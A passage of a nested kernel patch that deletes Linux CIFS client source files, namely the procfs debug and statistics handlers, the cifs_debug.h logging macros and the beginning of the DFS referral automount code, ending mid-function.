+-						seq_puts(m, "\t[RECONNECTING] ");
+-				}
+-			}
+-			spin_unlock(&ses->chan_lock);
+-
+-			seq_puts(m, "\n\n\tShares: ");
+-			j = 0;
+-
+-			seq_printf(m, "\n\t%d) IPC: ", j);
+-			if (ses->tcon_ipc)
+-				cifs_debug_tcon(m, ses->tcon_ipc);
+-			else
+-				seq_puts(m, "none\n");
+-
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				++j;
+-				seq_printf(m, "\n\t%d) ", j);
+-				cifs_debug_tcon(m, tcon);
+-			}
+-
+-			spin_lock(&ses->iface_lock);
+-			if (ses->iface_count)
+-				seq_printf(m, "\n\n\tServer interfaces: %zu",
+-					   ses->iface_count);
+-			j = 0;
+-			list_for_each_entry(iface, &ses->iface_list,
+-						 iface_head) {
+-				seq_printf(m, "\n\t%d)", ++j);
+-				cifs_dump_iface(m, iface);
+-				if (is_ses_using_iface(ses, iface))
+-					seq_puts(m, "\t\t[CONNECTED]\n");
+-			}
+-			spin_unlock(&ses->iface_lock);
+-
+-			seq_puts(m, "\n\n\tMIDs: ");
+-			spin_lock(&ses->chan_lock);
+-			for (j = 0; j < ses->chan_count; j++) {
+-				chan_server = ses->chans[j].server;
+-				if (!chan_server)
+-					continue;
+-
+-				if (list_empty(&chan_server->pending_mid_q))
+-					continue;
+-
+-				seq_printf(m, "\n\tServer ConnectionId: 0x%llx",
+-					   chan_server->conn_id);
+-				spin_lock(&chan_server->mid_lock);
+-				list_for_each_entry(mid_entry, &chan_server->pending_mid_q, qhead) {
+-					seq_printf(m, "\n\t\tState: %d com: %d pid: %d cbdata: %p mid %llu",
+-						   mid_entry->mid_state,
+-						   le16_to_cpu(mid_entry->command),
+-						   mid_entry->pid,
+-						   mid_entry->callback_data,
+-						   mid_entry->mid);
+-				}
+-				spin_unlock(&chan_server->mid_lock);
+-			}
+-			spin_unlock(&ses->chan_lock);
+-			seq_puts(m, "\n--\n");
+-		}
+-		if (i == 0)
+-			seq_printf(m, "\n\t\t[NONE]");
+-	}
+-	if (c == 0)
+-		seq_printf(m, "\n\t[NONE]");
+-
+-	spin_unlock(&cifs_tcp_ses_lock);
+-	seq_putc(m, '\n');
+-	cifs_swn_dump(m);
+-
+-	/* BB add code to dump additional info such as TCP session info now */
+-	return 0;
+-}
+-
+-static ssize_t cifs_stats_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	bool bv;
+-	int rc;
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	rc = kstrtobool_from_user(buffer, count, &bv);
+-	if (rc == 0) {
+-#ifdef CONFIG_CIFS_STATS2
+-		int i;
+-
+-		atomic_set(&total_buf_alloc_count, 0);
+-		atomic_set(&total_small_buf_alloc_count, 0);
+-#endif /* CONFIG_CIFS_STATS2 */
+-		atomic_set(&tcpSesReconnectCount, 0);
+-		atomic_set(&tconInfoReconnectCount, 0);
+-
+-		spin_lock(&GlobalMid_Lock);
+-		GlobalMaxActiveXid = 0;
+-		GlobalCurrentXid = 0;
+-		spin_unlock(&GlobalMid_Lock);
+-		spin_lock(&cifs_tcp_ses_lock);
+-		list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-			server->max_in_flight = 0;
+-#ifdef CONFIG_CIFS_STATS2
+-			for (i = 0; i < NUMBER_OF_SMB2_COMMANDS; i++) {
+-				atomic_set(&server->num_cmds[i], 0);
+-				atomic_set(&server->smb2slowcmd[i], 0);
+-				server->time_per_cmd[i] = 0;
+-				server->slowest_cmd[i] = 0;
+-				server->fastest_cmd[0] = 0;
+-			}
+-#endif /* CONFIG_CIFS_STATS2 */
+-			list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-				list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-					atomic_set(&tcon->num_smbs_sent, 0);
+-					spin_lock(&tcon->stat_lock);
+-					tcon->bytes_read = 0;
+-					tcon->bytes_written = 0;
+-					spin_unlock(&tcon->stat_lock);
+-					if (server->ops->clear_stats)
+-						server->ops->clear_stats(tcon);
+-				}
+-			}
+-		}
+-		spin_unlock(&cifs_tcp_ses_lock);
+-	} else {
+-		return rc;
+-	}
+-
+-	return count;
+-}
+-
+-static int cifs_stats_proc_show(struct seq_file *m, void *v)
+-{
+-	int i;
+-#ifdef CONFIG_CIFS_STATS2
+-	int j;
+-#endif /* STATS2 */
+-	struct TCP_Server_Info *server;
+-	struct cifs_ses *ses;
+-	struct cifs_tcon *tcon;
+-
+-	seq_printf(m, "Resources in use\nCIFS Session: %d\n",
+-			sesInfoAllocCount.counter);
+-	seq_printf(m, "Share (unique mount targets): %d\n",
+-			tconInfoAllocCount.counter);
+-	seq_printf(m, "SMB Request/Response Buffer: %d Pool size: %d\n",
+-			buf_alloc_count.counter,
+-			cifs_min_rcv + tcpSesAllocCount.counter);
+-	seq_printf(m, "SMB Small Req/Resp Buffer: %d Pool size: %d\n",
+-			small_buf_alloc_count.counter, cifs_min_small);
+-#ifdef CONFIG_CIFS_STATS2
+-	seq_printf(m, "Total Large %d Small %d Allocations\n",
+-				atomic_read(&total_buf_alloc_count),
+-				atomic_read(&total_small_buf_alloc_count));
+-#endif /* CONFIG_CIFS_STATS2 */
+-
+-	seq_printf(m, "Operations (MIDs): %d\n", atomic_read(&mid_count));
+-	seq_printf(m,
+-		"\n%d session %d share reconnects\n",
+-		tcpSesReconnectCount.counter, tconInfoReconnectCount.counter);
+-
+-	seq_printf(m,
+-		"Total vfs operations: %d maximum at one time: %d\n",
+-		GlobalCurrentXid, GlobalMaxActiveXid);
+-
+-	i = 0;
+-	spin_lock(&cifs_tcp_ses_lock);
+-	list_for_each_entry(server, &cifs_tcp_ses_list, tcp_ses_list) {
+-		seq_printf(m, "\nMax requests in flight: %d", server->max_in_flight);
+-#ifdef CONFIG_CIFS_STATS2
+-		seq_puts(m, "\nTotal time spent processing by command. Time ");
+-		seq_printf(m, "units are jiffies (%d per second)\n", HZ);
+-		seq_puts(m, "  SMB3 CMD\tNumber\tTotal Time\tFastest\tSlowest\n");
+-		seq_puts(m, "  --------\t------\t----------\t-------\t-------\n");
+-		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			seq_printf(m, "  %d\t\t%d\t%llu\t\t%u\t%u\n", j,
+-				atomic_read(&server->num_cmds[j]),
+-				server->time_per_cmd[j],
+-				server->fastest_cmd[j],
+-				server->slowest_cmd[j]);
+-		for (j = 0; j < NUMBER_OF_SMB2_COMMANDS; j++)
+-			if (atomic_read(&server->smb2slowcmd[j])) {
+-				spin_lock(&server->srv_lock);
+-				seq_printf(m, "  %d slow responses from %s for command %d\n",
+-					atomic_read(&server->smb2slowcmd[j]),
+-					server->hostname, j);
+-				spin_unlock(&server->srv_lock);
+-			}
+-#endif /* STATS2 */
+-		list_for_each_entry(ses, &server->smb_ses_list, smb_ses_list) {
+-			list_for_each_entry(tcon, &ses->tcon_list, tcon_list) {
+-				i++;
+-				seq_printf(m, "\n%d) %s", i, tcon->tree_name);
+-				if (tcon->need_reconnect)
+-					seq_puts(m, "\tDISCONNECTED ");
+-				seq_printf(m, "\nSMBs: %d",
+-					   atomic_read(&tcon->num_smbs_sent));
+-				if (server->ops->print_stats)
+-					server->ops->print_stats(m, tcon);
+-			}
+-		}
+-	}
+-	spin_unlock(&cifs_tcp_ses_lock);
+-
+-	seq_putc(m, '\n');
+-	return 0;
+-}
+-
+-static int cifs_stats_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_stats_proc_show, NULL);
+-}
+-
+-static const struct proc_ops cifs_stats_proc_ops = {
+-	.proc_open	= cifs_stats_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_stats_proc_write,
+-};
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-#define PROC_FILE_DEFINE(name) \
+-static ssize_t name##_write(struct file *file, const char __user *buffer, \
+-	size_t count, loff_t *ppos) \
+-{ \
+-	int rc; \
+-	rc = kstrtoint_from_user(buffer, count, 10, & name); \
+-	if (rc) \
+-		return rc; \
+-	return count; \
+-} \
+-static int name##_proc_show(struct seq_file *m, void *v) \
+-{ \
+-	seq_printf(m, "%d\n", name ); \
+-	return 0; \
+-} \
+-static int name##_open(struct inode *inode, struct file *file) \
+-{ \
+-	return single_open(file, name##_proc_show, NULL); \
+-} \
+-\
+-static const struct proc_ops cifs_##name##_proc_fops = { \
+-	.proc_open	= name##_open, \
+-	.proc_read	= seq_read, \
+-	.proc_lseek	= seq_lseek, \
+-	.proc_release	= single_release, \
+-	.proc_write	= name##_write, \
+-}
+-
+-PROC_FILE_DEFINE(rdma_readwrite_threshold);
+-PROC_FILE_DEFINE(smbd_max_frmr_depth);
+-PROC_FILE_DEFINE(smbd_keep_alive_interval);
+-PROC_FILE_DEFINE(smbd_max_receive_size);
+-PROC_FILE_DEFINE(smbd_max_fragmented_recv_size);
+-PROC_FILE_DEFINE(smbd_max_send_size);
+-PROC_FILE_DEFINE(smbd_send_credit_target);
+-PROC_FILE_DEFINE(smbd_receive_credit_max);
+-#endif
+-
+-static struct proc_dir_entry *proc_fs_cifs;
+-static const struct proc_ops cifsFYI_proc_ops;
+-static const struct proc_ops cifs_lookup_cache_proc_ops;
+-static const struct proc_ops traceSMB_proc_ops;
+-static const struct proc_ops cifs_security_flags_proc_ops;
+-static const struct proc_ops cifs_linux_ext_proc_ops;
+-static const struct proc_ops cifs_mount_params_proc_ops;
+-
+-void
+-cifs_proc_init(void)
+-{
+-	proc_fs_cifs = proc_mkdir("fs/cifs", NULL);
+-	if (proc_fs_cifs == NULL)
+-		return;
+-
+-	proc_create_single("DebugData", 0, proc_fs_cifs,
+-			cifs_debug_data_proc_show);
+-
+-	proc_create_single("open_files", 0400, proc_fs_cifs,
+-			cifs_debug_files_proc_show);
+-
+-	proc_create("Stats", 0644, proc_fs_cifs, &cifs_stats_proc_ops);
+-	proc_create("cifsFYI", 0644, proc_fs_cifs, &cifsFYI_proc_ops);
+-	proc_create("traceSMB", 0644, proc_fs_cifs, &traceSMB_proc_ops);
+-	proc_create("LinuxExtensionsEnabled", 0644, proc_fs_cifs,
+-		    &cifs_linux_ext_proc_ops);
+-	proc_create("SecurityFlags", 0644, proc_fs_cifs,
+-		    &cifs_security_flags_proc_ops);
+-	proc_create("LookupCacheEnabled", 0644, proc_fs_cifs,
+-		    &cifs_lookup_cache_proc_ops);
+-
+-	proc_create("mount_params", 0444, proc_fs_cifs, &cifs_mount_params_proc_ops);
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	proc_create("dfscache", 0644, proc_fs_cifs, &dfscache_proc_ops);
+-#endif
+-
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	proc_create("rdma_readwrite_threshold", 0644, proc_fs_cifs,
+-		&cifs_rdma_readwrite_threshold_proc_fops);
+-	proc_create("smbd_max_frmr_depth", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_frmr_depth_proc_fops);
+-	proc_create("smbd_keep_alive_interval", 0644, proc_fs_cifs,
+-		&cifs_smbd_keep_alive_interval_proc_fops);
+-	proc_create("smbd_max_receive_size", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_receive_size_proc_fops);
+-	proc_create("smbd_max_fragmented_recv_size", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_fragmented_recv_size_proc_fops);
+-	proc_create("smbd_max_send_size", 0644, proc_fs_cifs,
+-		&cifs_smbd_max_send_size_proc_fops);
+-	proc_create("smbd_send_credit_target", 0644, proc_fs_cifs,
+-		&cifs_smbd_send_credit_target_proc_fops);
+-	proc_create("smbd_receive_credit_max", 0644, proc_fs_cifs,
+-		&cifs_smbd_receive_credit_max_proc_fops);
+-#endif
+-}
+-
+-void
+-cifs_proc_clean(void)
+-{
+-	if (proc_fs_cifs == NULL)
+-		return;
+-
+-	remove_proc_entry("DebugData", proc_fs_cifs);
+-	remove_proc_entry("open_files", proc_fs_cifs);
+-	remove_proc_entry("cifsFYI", proc_fs_cifs);
+-	remove_proc_entry("traceSMB", proc_fs_cifs);
+-	remove_proc_entry("Stats", proc_fs_cifs);
+-	remove_proc_entry("SecurityFlags", proc_fs_cifs);
+-	remove_proc_entry("LinuxExtensionsEnabled", proc_fs_cifs);
+-	remove_proc_entry("LookupCacheEnabled", proc_fs_cifs);
+-	remove_proc_entry("mount_params", proc_fs_cifs);
+-
+-#ifdef CONFIG_CIFS_DFS_UPCALL
+-	remove_proc_entry("dfscache", proc_fs_cifs);
+-#endif
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-	remove_proc_entry("rdma_readwrite_threshold", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_frmr_depth", proc_fs_cifs);
+-	remove_proc_entry("smbd_keep_alive_interval", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_receive_size", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_fragmented_recv_size", proc_fs_cifs);
+-	remove_proc_entry("smbd_max_send_size", proc_fs_cifs);
+-	remove_proc_entry("smbd_send_credit_target", proc_fs_cifs);
+-	remove_proc_entry("smbd_receive_credit_max", proc_fs_cifs);
+-#endif
+-	remove_proc_entry("fs/cifs", NULL);
+-}
+-
+-static int cifsFYI_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", cifsFYI);
+-	return 0;
+-}
+-
+-static int cifsFYI_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifsFYI_proc_show, NULL);
+-}
+-
+-static ssize_t cifsFYI_proc_write(struct file *file, const char __user *buffer,
+-		size_t count, loff_t *ppos)
+-{
+-	char c[2] = { '\0' };
+-	bool bv;
+-	int rc;
+-
+-	rc = get_user(c[0], buffer);
+-	if (rc)
+-		return rc;
+-	if (strtobool(c, &bv) == 0)
+-		cifsFYI = bv;
+-	else if ((c[0] > '1') && (c[0] <= '9'))
+-		cifsFYI = (int) (c[0] - '0'); /* see cifs_debug.h for meanings */
+-	else
+-		return -EINVAL;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops cifsFYI_proc_ops = {
+-	.proc_open	= cifsFYI_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifsFYI_proc_write,
+-};
+-
+-static int cifs_linux_ext_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", linuxExtEnabled);
+-	return 0;
+-}
+-
+-static int cifs_linux_ext_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_linux_ext_proc_show, NULL);
+-}
+-
+-static ssize_t cifs_linux_ext_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	int rc;
+-
+-	rc = kstrtobool_from_user(buffer, count, &linuxExtEnabled);
+-	if (rc)
+-		return rc;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops cifs_linux_ext_proc_ops = {
+-	.proc_open	= cifs_linux_ext_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_linux_ext_proc_write,
+-};
+-
+-static int cifs_lookup_cache_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", lookupCacheEnabled);
+-	return 0;
+-}
+-
+-static int cifs_lookup_cache_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_lookup_cache_proc_show, NULL);
+-}
+-
+-static ssize_t cifs_lookup_cache_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	int rc;
+-
+-	rc = kstrtobool_from_user(buffer, count, &lookupCacheEnabled);
+-	if (rc)
+-		return rc;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops cifs_lookup_cache_proc_ops = {
+-	.proc_open	= cifs_lookup_cache_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_lookup_cache_proc_write,
+-};
+-
+-static int traceSMB_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "%d\n", traceSMB);
+-	return 0;
+-}
+-
+-static int traceSMB_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, traceSMB_proc_show, NULL);
+-}
+-
+-static ssize_t traceSMB_proc_write(struct file *file, const char __user *buffer,
+-		size_t count, loff_t *ppos)
+-{
+-	int rc;
+-
+-	rc = kstrtobool_from_user(buffer, count, &traceSMB);
+-	if (rc)
+-		return rc;
+-
+-	return count;
+-}
+-
+-static const struct proc_ops traceSMB_proc_ops = {
+-	.proc_open	= traceSMB_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= traceSMB_proc_write,
+-};
+-
+-static int cifs_security_flags_proc_show(struct seq_file *m, void *v)
+-{
+-	seq_printf(m, "0x%x\n", global_secflags);
+-	return 0;
+-}
+-
+-static int cifs_security_flags_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_security_flags_proc_show, NULL);
+-}
+-
+-/*
+- * Ensure that if someone sets a MUST flag, that we disable all other MAY
+- * flags except for the ones corresponding to the given MUST flag. If there are
+- * multiple MUST flags, then try to prefer more secure ones.
+- */
+-static void
+-cifs_security_flags_handle_must_flags(unsigned int *flags)
+-{
+-	unsigned int signflags = *flags & CIFSSEC_MUST_SIGN;
+-
+-	if ((*flags & CIFSSEC_MUST_KRB5) == CIFSSEC_MUST_KRB5)
+-		*flags = CIFSSEC_MUST_KRB5;
+-	else if ((*flags & CIFSSEC_MUST_NTLMSSP) == CIFSSEC_MUST_NTLMSSP)
+-		*flags = CIFSSEC_MUST_NTLMSSP;
+-	else if ((*flags & CIFSSEC_MUST_NTLMV2) == CIFSSEC_MUST_NTLMV2)
+-		*flags = CIFSSEC_MUST_NTLMV2;
+-
+-	*flags |= signflags;
+-}
+-
+-static ssize_t cifs_security_flags_proc_write(struct file *file,
+-		const char __user *buffer, size_t count, loff_t *ppos)
+-{
+-	int rc;
+-	unsigned int flags;
+-	char flags_string[12];
+-	bool bv;
+-
+-	if ((count < 1) || (count > 11))
+-		return -EINVAL;
+-
+-	memset(flags_string, 0, 12);
+-
+-	if (copy_from_user(flags_string, buffer, count))
+-		return -EFAULT;
+-
+-	if (count < 3) {
+-		/* single char or single char followed by null */
+-		if (strtobool(flags_string, &bv) == 0) {
+-			global_secflags = bv ? CIFSSEC_MAX : CIFSSEC_DEF;
+-			return count;
+-		} else if (!isdigit(flags_string[0])) {
+-			cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
+-					flags_string);
+-			return -EINVAL;
+-		}
+-	}
+-
+-	/* else we have a number */
+-	rc = kstrtouint(flags_string, 0, &flags);
+-	if (rc) {
+-		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n",
+-				flags_string);
+-		return rc;
+-	}
+-
+-	cifs_dbg(FYI, "sec flags 0x%x\n", flags);
+-
+-	if (flags == 0)  {
+-		cifs_dbg(VFS, "Invalid SecurityFlags: %s\n", flags_string);
+-		return -EINVAL;
+-	}
+-
+-	if (flags & ~CIFSSEC_MASK) {
+-		cifs_dbg(VFS, "Unsupported security flags: 0x%x\n",
+-			 flags & ~CIFSSEC_MASK);
+-		return -EINVAL;
+-	}
+-
+-	cifs_security_flags_handle_must_flags(&flags);
+-
+-	/* flags look ok - update the global security flags for cifs module */
+-	global_secflags = flags;
+-	if (global_secflags & CIFSSEC_MUST_SIGN) {
+-		/* requiring signing implies signing is allowed */
+-		global_secflags |= CIFSSEC_MAY_SIGN;
+-		cifs_dbg(FYI, "packet signing now required\n");
+-	} else if ((global_secflags & CIFSSEC_MAY_SIGN) == 0) {
+-		cifs_dbg(FYI, "packet signing disabled\n");
+-	}
+-	/* BB should we turn on MAY flags for other MUST options? */
+-	return count;
+-}
+-
+-static const struct proc_ops cifs_security_flags_proc_ops = {
+-	.proc_open	= cifs_security_flags_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	.proc_write	= cifs_security_flags_proc_write,
+-};
+-
+-/* To make it easier to debug, can help to show mount params */
+-static int cifs_mount_params_proc_show(struct seq_file *m, void *v)
+-{
+-	const struct fs_parameter_spec *p;
+-	const char *type;
+-
+-	for (p = smb3_fs_parameters; p->name; p++) {
+-		/* cannot use switch with pointers... */
+-		if (!p->type) {
+-			if (p->flags == fs_param_neg_with_no)
+-				type = "noflag";
+-			else
+-				type = "flag";
+-		} else if (p->type == fs_param_is_bool)
+-			type = "bool";
+-		else if (p->type == fs_param_is_u32)
+-			type = "u32";
+-		else if (p->type == fs_param_is_u64)
+-			type = "u64";
+-		else if (p->type == fs_param_is_string)
+-			type = "string";
+-		else
+-			type = "unknown";
+-
+-		seq_printf(m, "%s:%s\n", p->name, type);
+-	}
+-
+-	return 0;
+-}
+-
+-static int cifs_mount_params_proc_open(struct inode *inode, struct file *file)
+-{
+-	return single_open(file, cifs_mount_params_proc_show, NULL);
+-}
+-
+-static const struct proc_ops cifs_mount_params_proc_ops = {
+-	.proc_open	= cifs_mount_params_proc_open,
+-	.proc_read	= seq_read,
+-	.proc_lseek	= seq_lseek,
+-	.proc_release	= single_release,
+-	/* No need for write for now */
+-	/* .proc_write	= cifs_mount_params_proc_write, */
+-};
+-
+-#else
+-inline void cifs_proc_init(void)
+-{
+-}
+-
+-inline void cifs_proc_clean(void)
+-{
+-}
+-#endif /* PROC_FS */
+diff --git a/fs/cifs/cifs_debug.h b/fs/cifs/cifs_debug.h
+deleted file mode 100644
+index ce5cfd236fdb8..0000000000000
+--- a/fs/cifs/cifs_debug.h
++++ /dev/null
+@@ -1,160 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *
+- *   Copyright (c) International Business Machines  Corp., 2000,2002
+- *   Modified by Steve French (sfrench@us.ibm.com)
+- */
+-
+-#ifndef _H_CIFS_DEBUG
+-#define _H_CIFS_DEBUG
+-
+-#ifdef pr_fmt
+-#undef pr_fmt
+-#endif
+-
+-#define pr_fmt(fmt) "CIFS: " fmt
+-
+-void cifs_dump_mem(char *label, void *data, int length);
+-void cifs_dump_detail(void *buf, struct TCP_Server_Info *ptcp_info);
+-void cifs_dump_mids(struct TCP_Server_Info *);
+-extern bool traceSMB;		/* flag which enables the function below */
+-void dump_smb(void *, int);
+-#define CIFS_INFO	0x01
+-#define CIFS_RC		0x02
+-#define CIFS_TIMER	0x04
+-
+-#define VFS 1
+-#define FYI 2
+-extern int cifsFYI;
+-#ifdef CONFIG_CIFS_DEBUG2
+-#define NOISY 4
+-#else
+-#define NOISY 0
+-#endif
+-#define ONCE 8
+-
+-/*
+- *	debug ON
+- *	--------
+- */
+-#ifdef CONFIG_CIFS_DEBUG
+-
+-
+-/*
+- * When adding tracepoints and debug messages we have various choices.
+- * Some considerations:
+- *
+- * Use cifs_dbg(VFS, ...) for things we always want logged, and the user to see
+- *     cifs_info(...) slightly less important, admin can filter via loglevel > 6
+- *     cifs_dbg(FYI, ...) minor debugging messages, off by default
+- *     trace_smb3_*  ftrace functions are preferred for complex debug messages
+- *                 intended for developers or experienced admins, off by default
+- */
+-
+-/* Information level messages, minor events */
+-#define cifs_info_func(ratefunc, fmt, ...)				\
+-	pr_info_ ## ratefunc(fmt, ##__VA_ARGS__)
+-
+-#define cifs_info(fmt, ...)						\
+-	cifs_info_func(ratelimited, fmt, ##__VA_ARGS__)
+-
+-/* information message: e.g., configuration, major event */
+-#define cifs_dbg_func(ratefunc, type, fmt, ...)				\
+-do {									\
+-	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+-		pr_debug_ ## ratefunc("%s: " fmt,			\
+-				      __FILE__, ##__VA_ARGS__);		\
+-	} else if ((type) & VFS) {					\
+-		pr_err_ ## ratefunc("VFS: " fmt, ##__VA_ARGS__);	\
+-	} else if ((type) & NOISY && (NOISY != 0)) {			\
+-		pr_debug_ ## ratefunc(fmt, ##__VA_ARGS__);		\
+-	}								\
+-} while (0)
+-
+-#define cifs_dbg(type, fmt, ...)					\
+-do {									\
+-	if ((type) & ONCE)						\
+-		cifs_dbg_func(once, type, fmt, ##__VA_ARGS__);		\
+-	else								\
+-		cifs_dbg_func(ratelimited, type, fmt, ##__VA_ARGS__);	\
+-} while (0)
+-
+-#define cifs_server_dbg_func(ratefunc, type, fmt, ...)			\
+-do {									\
+-	spin_lock(&server->srv_lock);					\
+-	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+-		pr_debug_ ## ratefunc("%s: \\\\%s " fmt,		\
+-				      __FILE__, server->hostname,	\
+-				      ##__VA_ARGS__);			\
+-	} else if ((type) & VFS) {					\
+-		pr_err_ ## ratefunc("VFS: \\\\%s " fmt,			\
+-				    server->hostname, ##__VA_ARGS__);	\
+-	} else if ((type) & NOISY && (NOISY != 0)) {			\
+-		pr_debug_ ## ratefunc("\\\\%s " fmt,			\
+-				      server->hostname, ##__VA_ARGS__);	\
+-	}								\
+-	spin_unlock(&server->srv_lock);					\
+-} while (0)
+-
+-#define cifs_server_dbg(type, fmt, ...)					\
+-do {									\
+-	if ((type) & ONCE)						\
+-		cifs_server_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
+-	else								\
+-		cifs_server_dbg_func(ratelimited, type, fmt,		\
+-				     ##__VA_ARGS__);			\
+-} while (0)
+-
+-#define cifs_tcon_dbg_func(ratefunc, type, fmt, ...)			\
+-do {									\
+-	const char *tn = "";						\
+-	if (tcon && tcon->tree_name)					\
+-		tn = tcon->tree_name;					\
+-	if ((type) & FYI && cifsFYI & CIFS_INFO) {			\
+-		pr_debug_ ## ratefunc("%s: %s "	fmt,			\
+-				      __FILE__, tn, ##__VA_ARGS__);	\
+-	} else if ((type) & VFS) {					\
+-		pr_err_ ## ratefunc("VFS: %s " fmt, tn, ##__VA_ARGS__);	\
+-	} else if ((type) & NOISY && (NOISY != 0)) {			\
+-		pr_debug_ ## ratefunc("%s " fmt, tn, ##__VA_ARGS__);	\
+-	}								\
+-} while (0)
+-
+-#define cifs_tcon_dbg(type, fmt, ...)					\
+-do {									\
+-	if ((type) & ONCE)						\
+-		cifs_tcon_dbg_func(once, type, fmt, ##__VA_ARGS__);	\
+-	else								\
+-		cifs_tcon_dbg_func(ratelimited, type, fmt,		\
+-				   ##__VA_ARGS__);			\
+-} while (0)
+-
+-/*
+- *	debug OFF
+- *	---------
+- */
+-#else		/* _CIFS_DEBUG */
+-#define cifs_dbg(type, fmt, ...)					\
+-do {									\
+-	if (0)								\
+-		pr_debug(fmt, ##__VA_ARGS__);				\
+-} while (0)
+-
+-#define cifs_server_dbg(type, fmt, ...)					\
+-do {									\
+-	if (0)								\
+-		pr_debug("\\\\%s " fmt,					\
+-			 server->hostname, ##__VA_ARGS__);		\
+-} while (0)
+-
+-#define cifs_tcon_dbg(type, fmt, ...)					\
+-do {									\
+-	if (0)								\
+-		pr_debug("%s " fmt, tcon->tree_name, ##__VA_ARGS__);	\
+-} while (0)
+-
+-#define cifs_info(fmt, ...)						\
+-	pr_info(fmt, ##__VA_ARGS__)
+-#endif
+-
+-#endif				/* _H_CIFS_DEBUG */
+diff --git a/fs/cifs/cifs_dfs_ref.c b/fs/cifs/cifs_dfs_ref.c
+deleted file mode 100644
+index b0864da9ef434..0000000000000
+--- a/fs/cifs/cifs_dfs_ref.c
++++ /dev/null
+@@ -1,374 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Contains the CIFS DFS referral mounting routines used for handling
+- *   traversal via DFS junction point
+- *
+- *   Copyright (c) 2007 Igor Mammedov
+- *   Copyright (C) International Business Machines  Corp., 2008
+- *   Author(s): Igor Mammedov (niallain@gmail.com)
+- *		Steve French (sfrench@us.ibm.com)
+- */
+-
+-#include <linux/dcache.h>
+-#include <linux/mount.h>
+-#include <linux/namei.h>
+-#include <linux/slab.h>
+-#include <linux/vfs.h>
+-#include <linux/fs.h>
+-#include <linux/inet.h>
+-#include "cifsglob.h"
+-#include "cifsproto.h"
+-#include "cifsfs.h"
+-#include "dns_resolve.h"
+-#include "cifs_debug.h"
+-#include "cifs_unicode.h"
+-#include "dfs_cache.h"
+-#include "fs_context.h"
+-
+-static LIST_HEAD(cifs_dfs_automount_list);
+-
+-static void cifs_dfs_expire_automounts(struct work_struct *work);
+-static DECLARE_DELAYED_WORK(cifs_dfs_automount_task,
+-			    cifs_dfs_expire_automounts);
+-static int cifs_dfs_mountpoint_expiry_timeout = 500 * HZ;
+-
+-static void cifs_dfs_expire_automounts(struct work_struct *work)
+-{
+-	struct list_head *list = &cifs_dfs_automount_list;
+-
+-	mark_mounts_for_expiry(list);
+-	if (!list_empty(list))
+-		schedule_delayed_work(&cifs_dfs_automount_task,
+-				      cifs_dfs_mountpoint_expiry_timeout);
+-}
+-
+-void cifs_dfs_release_automount_timer(void)
+-{
+-	BUG_ON(!list_empty(&cifs_dfs_automount_list));
+-	cancel_delayed_work_sync(&cifs_dfs_automount_task);
+-}
+-
+-/**
+- * cifs_build_devname - build a devicename from a UNC and optional prepath
+- * @nodename:	pointer to UNC string
+- * @prepath:	pointer to prefixpath (or NULL if there isn't one)
+- *
+- * Build a new cifs devicename after chasing a DFS referral. Allocate a buffer
+- * big enough to hold the final thing. Copy the UNC from the nodename, and
+- * concatenate the prepath onto the end of it if there is one.
+- *
+- * Returns pointer to the built string, or a ERR_PTR. Caller is responsible
+- * for freeing the returned string.
+- */
+-static char *
+-cifs_build_devname(char *nodename, const char *prepath)
+-{
+-	size_t pplen;
